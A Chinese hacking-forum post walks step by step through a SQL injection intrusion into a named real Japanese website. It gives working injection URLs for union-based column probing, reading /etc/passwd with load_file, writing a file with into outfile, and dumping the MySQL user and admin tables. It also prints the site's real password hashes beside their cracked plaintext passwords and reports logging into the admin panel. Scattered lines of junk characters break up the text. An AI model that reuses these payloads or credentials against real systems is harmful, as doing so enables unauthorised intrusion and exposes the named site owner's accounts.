|
|
# b+ P2 i" {9 H* x2 Y$ @9 X5 R7 d" Q
# X) Q+ y4 W2 h- f! }
0x01. 检测 www.zuaa.jp 收集数据
( d* Y2 j2 V, D& S- K) t7 N+ m! {( {4 J) c, y
0 @, |' n4 j3 Y9 |/ @* @" gwhatweb- Z' d1 j, f2 a( w, S
1 e8 T( \& Z9 T3 a- e/ N
% J1 F* y6 G+ G. R/ C) V利用NMAP扫描* `/ w4 h& s4 G: P% [
" m5 f2 `/ k/ y" X9 p- p- _中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持
3 c. S: H8 P5 J6 W! O0x02.找注入点" {; `3 h( N3 N {& s: W6 B
找注入点:http://www.zuaa.jp/php/newsdetail.php?topic_id=390
! @8 `1 u$ a/ K. C2 H, ?
! f' ?" |, k5 |6 i. H5 l0 F/ q" n- W) Z) `0 D& ^
0x03.order by- ~3 l6 y: N5 a- H& T- ^
http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1
% h7 K/ k4 Y" Y
* Q7 j! T1 l. M) u6 c3 K: border by 28报错,order by 27正常/ r3 o& h" V6 O. H( O% R1 M
: @" i$ ]4 e; M* H0x04. union手动查询! R) s; X J0 T+ {4 q
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 " u3 {" u* K2 E- K+ g9 V' }) D1 n
添加到 27 时正常显示
$ U, n; A) A6 U U. Y7 _3 s; o8 y6 H5 p0 X! ?
中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持
+ |& q3 z9 L' B4 B4 h
' r. f) K! t! @5 W/ h0x05. info:; O, l0 }9 U) D3 a
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
" v' s9 {" x# ~2 J/ e/ p- _: u' d3 e& x) R5 j% e/ y& Y
user: root@localhost. L& F8 v7 a7 Z" b7 s/ Z- [
database: openpne
, C, B0 c/ _) }7 V" Rversion: 4.1.22
h% N7 z7 P* E, q2 o- y& kos: portbld-freebsd5.48 K$ ]2 g4 o$ o6 _8 I" F
0 q. q. U7 v8 p& \9 B5 O' W0x06. root用户% |5 }! B' S4 K
利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的(这种方法, 可以过大多数站)
}) t5 p2 J7 ]/ ?# q5 Vhttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
) N0 K4 u* k7 p" C2 v
: r7 d) O5 U. a通过工具转换
$ l, W9 G. W. f7 g' w
/ `2 q* j* A5 b5 w中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持) F6 x* C3 {- H% O9 i! U' A
/ b/ a4 r" A' R) e1 P; r" g- p3 ^, s
0x07. 利用 into outfile4 V- d6 ]! x. J7 w% O0 e2 q% f
全部都失败 a' F. x w" {7 I/ p# z
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php% a! H1 u0 Z4 O/ B8 l8 H; U* N- O
' D: F/ R4 b F0 r9 L7 |http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php 2 x, }8 _# \; q2 ^: G3 [; A; L
, ^: \6 |' t* @& y- v页面显示“MDB2 Error:syntax error”
7 y5 f3 u. V! P8 C) W5 e# A" P. m" [0 v/ {) G! ?; t- M: \1 j$ z: c
0x08. 利用 mysql 4.1# H) R$ Y5 y8 C0 ?, D* S+ E
猜常规表名,字段未果 工具 sqlmap
, m+ h ]/ w- |4 [1 ?9 ?% [中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持0 u. t" V! @0 f
% E+ T0 d) ^- i) N1 v4 P; y; B4 r# G6 i1 W
, m# l8 f1 I' c7 F7 b Z0x09. 查找后台( b9 Y1 n2 G2 y/ \/ ]& ?# t2 U
利用 现有的各种 后台工具尝试都不行# V1 b$ F" \4 L9 U
5 j, k" {# B4 ~; F1 m! P% g2 R* G
0x10. MySL外联方法
# {0 _$ s4 D& b+ f2 m从前面 nmap 收集的信息当中,可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码,然后再通过 mysql 工具外连 www.zuaa.jp 不行! ^0 |9 Q+ n( S! X2 V6 P! s
可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user
! b% B( ~7 j. \2 u* d+ Ohttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user7 S8 P' K9 t/ K' a+ n
* B4 f O9 A/ z$ F. a3 @; F
这个可以在 www.cmd5.com 解密
- l7 |" j+ A8 u$ @9 ~8 P5 eroot:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa20090 J1 C. R% V3 J+ P u) a0 c+ i; L1 @
chen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97$ ]8 Q4 [# S4 R! U' }' S7 p1 J& b9 v
openpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???) K4 U$ S/ X P$ H& h
zuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
& z, N3 {. \* C工具外连失败,据说防火墙策略只允许特定IP外连,具体不得知' j& w8 {3 b7 K: b d; K
i% k, z* @3 b" M& K$ x( ~ z# F
7 y- v) D2 Y6 T4 W5 ]. r0x11. 网站突破: _( s" ?% i' t- c
发现网站的源程序 openpne, google 下载 openpne 源码
' J. b4 M% ?5 S* b
8 t6 ?+ d% V j: S; S r% d5 J) D! x, \! V, N
0x12. 默认信息利用) V% n- }& f n% f, V
http://sns.zuaa.jp/?m=admin&a=page_login3 R/ ~ z2 Y8 ?0 C
. L4 O8 {% n5 r: l" G# d) T- l$ N( G
表名 (c_admin_user) ,字段名(username,password), t; u( ]1 U. C5 c
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user2 j8 E; k% S! r$ e4 I/ d$ k: s% V% U
) n3 \' }* B. B. i
解密
) q3 O* E/ `2 | h. a+ d) e* vzuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda, zuaa2009
% Z I/ l5 O! p% O3 g* Q* \zuaajp:c0923ec5857796a393da99905008c176, zju1897 }$ B, T. s/ Z R& T! |3 G: x
6 l4 B! W% U- ?* M6 t8 ]+ E$ l中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持6 g4 | ~# A4 s* ^: i
s2 @- I0 F; F) y7 _0 w5 Y. B K6 P0x13. 登录后台7 ]8 g9 t' B3 \* N
8 J* G1 p k$ G/ T' B! O: A- |, q: Q# T
& Q# g1 b6 ^6 ]7 n: c1 W" r' x0x14. 小结
# @. I* R) \9 J9 n6 L利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 。
/ e: V# t! z" @2 H感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点- z9 F9 F" m& D* E
------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain
9 M# x$ q0 G, G: o中国网络渗透测评联盟:http://www.political-security.com/ 提供技术支持
5 q% y1 F; y9 U3 w4 h# ]9 x1 {1 u9 j6 I0 q$ H3 Z! k4 f G
最后声明:本人只负责了整理上传到论坛,让大家学习,不是原作者,原作者辛苦了!' h# Q8 J# o) ]) s0 b, g8 x
|
本帖子中包含更多资源
您需要 登录 才可以下载或查看,没有帐号?立即注册
x
|
发表于 2012-9-17 16:22:02
收藏
支持
反对
发表于 2012-9-19 08:27:03